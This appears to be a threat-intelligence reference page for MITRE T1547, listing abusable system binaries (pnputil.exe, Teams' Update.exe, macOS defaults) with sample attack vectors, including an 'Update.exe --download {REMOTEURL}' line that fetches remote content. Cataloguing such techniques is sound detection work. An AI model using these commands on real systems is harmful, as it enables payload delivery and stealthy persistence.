T1547: Technique T1547
Adversaries may leverage living-off-the-land techniques (T1547) to achieve execution, evade defenses, or transfer tools.
Total Capable Binaries: 3
•
Windows: 2
•
Linux: 0
•
macOS: 1
Living-off-the-Land Matrix for T1547
Across 3 verified binariesWindows1 payloads
Pnputil.exe
Used for installing drivers
Sample Attack Vector:
pnputil.exe -i -a {PATH_ABSOLUTE:.inf}Windows13 payloads
Update.exe
Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Sample Attack Vector:
Update.exe --download {REMOTEURL}macOS0 payloads
defaults
Defaults reads and writes macOS user defaults and plist configuration files. Attackers abuse it to write LoginHook scripts or alter ScreenSaver preferences to achieve reboot persistence.
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection Engineer • Check Point